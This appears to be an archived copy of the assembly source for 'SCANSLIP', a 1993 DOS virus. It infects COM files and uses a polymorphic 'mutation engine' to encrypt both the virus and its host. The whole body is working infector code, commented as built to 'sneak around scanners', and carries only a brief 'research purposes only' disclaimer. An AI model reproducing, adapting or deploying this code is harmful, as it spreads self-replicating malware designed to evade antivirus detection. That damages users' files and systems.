home *** CD-ROM | disk | FTP | other *** search
- ;SCANSLIP (C) 1993 American Eagle Publications, Inc., All Rights Reserved!
-
- ;A small mutation-engine based COM infector which encrypts both the
- ;virus and the COM file. A real bear for disinfectors.
-
- ;This virus uses a modified Trident Polymorphic Engine in combination with the
- ;Darwinian Genetic Mutation Engine. It will sneak around scanners!
-
- ;This Virus for research purposes only. Please do not release!
- ;Please execute it only on a carefully controlled system, and only
- ;if you know what you're doing!
-
- .model tiny ;Tiny model to create a COM file
-
- .code
-
- extrn crypt:near ;mutation engine function
- extrn host:near ;host program
- extrn DEFINE_RANDOM_DNA:NEAR,MUTATE_DNA:NEAR
- extrn DNALOC:DWORD,DNALEN:WORD
- extrn GENE_GET:NEAR,GENE_PTR:DWORD
-
- ;DTA definitions
- DTA EQU 0000H ;Disk transfer area
- FSIZE EQU DTA+1AH ;file size location in file search
- FNAME EQU DTA+1EH ;file name location in file search
-
- ORG 100H
-
- ;******************************************************************************
- ;The virus starts here.
-
- VIRSTART:
- call GETLOC
- GETLOC: pop si
- sub si,3 ;heres where virus starts
- push si
- mov ax,ds
- add ax,1000H
- mov es,ax ;upper segment is this one + 1000H
- mov di,100H ;move virus there at offset 100H
- mov cx,OFFSET HOST - 100H
- rep movsb ;this will louse the infection up if run under debug!
- mov ds,ax ;set ds to high segment
- push ds
- mov ax,OFFSET FIND_FILE
- push ax
- retf ;jump to high memory segment
-
- ;Now it's time to find a viable file to infect. We will look for any COM file
- ;and see if the virus is there already.
- FIND_FILE:
- pop si
- mov [HOSTOFS],si ;need this in high memory
- xor dx,dx ;move dta to high segment
- mov ah,1AH ;so we don't trash the command line
- int 21H ;which the host is expecting
- mov dx,OFFSET COMFILE
- mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr)
- mov ah,4EH ;DOS search first function
- int 21H
- CHECK_FILE: jnc NXT1
- jmp ALLDONE ;no COM files to infect
- NXT1: mov dx,FNAME ;first open the file
- mov ax,3D02H ;r/w access open file, since we'll want to write to it
- int 21H
- jc NEXT_FILE
- mov bx,ax ;put file handle in bx, and leave it there for the duration
- mov ax,5700H ;get file attribute
- int 21H
- mov ax,cx
- xor ax,dx ;date xor time mod 10 = 3 for infected file
- xor dx,dx
- mov cx,10
- div cx
- cmp dx,3
- jnz INFECT_FILE ;not 3, go infect
-
- NEXT_FILE: mov ah,4FH ;look for another file
- int 21H
- jmp SHORT CHECK_FILE ;and go check it out
-
- COMFILE DB '*.COM',0
- HOSTOFS DW 0
-
- ;When we get here, we've opened a file successfully, and read it into memory.
- ;In the high segment, the file is set up exactly as it will look when infected.
- ;Thus, to infect, we just rewrite the file from the start, using the image
- ;in the high segment.
- INFECT_FILE:
- push bx ;save file handle
-
- mov ax,OFFSET DNA ;set up address of DNA
- mov WORD PTR [DNALOC],ax ;for DGME
- mov WORD PTR [GENE_PTR],ax
- mov ax,cs
- mov WORD PTR [DNALOC+2],ax
- mov WORD PTR [GENE_PTR+2],ax
- mov ax,DNA_LENGTH
- mov [DNALEN],ax
- mov al,[FIRST] ;is this the first infection?
- or al,al
- jz MUTATE ;no, mutate the gene
- call DEFINE_RANDOM_DNA ;yes, define the DNA sequence to start
- jmp SHORT DNA_MODIFIED
- MUTATE: call MUTATE_DNA
-
- DNA_MODIFIED: xor al,al
- mov [FIRST],al
- pop bx
- push bx
- mov dx,OFFSET HOST ;end of virus
- mov di,FSIZE ;if read in first, this gets trashed by the engine
- mov cx,cs:[di] ;get file size for reading into buffer
- push cx
- mov ah,3FH ;DOS read function
- int 21H ;read host in
-
- pop cx
- add cx,OFFSET HOST - 100H ;size of code to encrypt
- mov dx,100H ;ds:dx --> code to encrypt
- mov bp,dx ;offset where execution begins
- mov di,0
- mov si,0
- mov ax,ds ;set up work seg for tpe
- add ax,1000H
- mov es,ax
- mov bl,1 ;small model
- mov ax,80H
- call crypt
- pop bx
-
- push dx
- push cx
-
- xor cx,cx
- mov dx,cx ;reset file pointer to start of file
- mov ax,4200H
- int 21H
- pop cx
- pop dx
- ; mov di,FSIZE
- ; add cx,cs:[di] ;add host size to size to write
-
- mov ah,40H
- int 21H ;write virus+host to file
-
- push cs
- pop ds ;ds=cs
-
- mov ax,5700H ;get date & time on file
- int 21H
- push dx
- mov ax,cx ;fix it
- xor ax,dx
- mov cx,10
- xor dx,dx
- div cx
- mul cx
- add ax,3
- pop dx
- xor ax,dx
- mov cx,ax
- mov ax,5701H ;and save it
- int 21H
-
- EXIT_ERR:
- mov ah,3EH ;close the file
- int 21H
-
- ;The infection process is now complete. This routine moves the host program
- ;down so that its code starts at offset 100H, and then transfers control to it.
- ALLDONE:
- mov bx,[HOSTOFS] ;relative offset of program
- sub bx,100H ;bx=size of decrypt routine
- mov ax,ss ;set ds, es to low segment again
- mov ds,ax
- mov es,ax
- push ax ;prep for retf to host
- mov dx,80H ;restore dta to original value
- mov ah,1AH ;for compatibility
- int 21H
- mov di,100H ;prep to move host back to original location
- mov si,OFFSET HOST
- add si,bx
- push di
- mov cx,sp ;move code, but don't trash the stack
- sub cx,si
- rep movsb ;move code
- retf ;and return to host
-
- FIRST DB 1 ; = 1 if this is the 1st generation
- DNA_LENGTH EQU 100H ;length of DNA for this virus
- DNA DB DNA_LENGTH dup (0) ;DNA for this virus
-
- END VIRSTART
- �
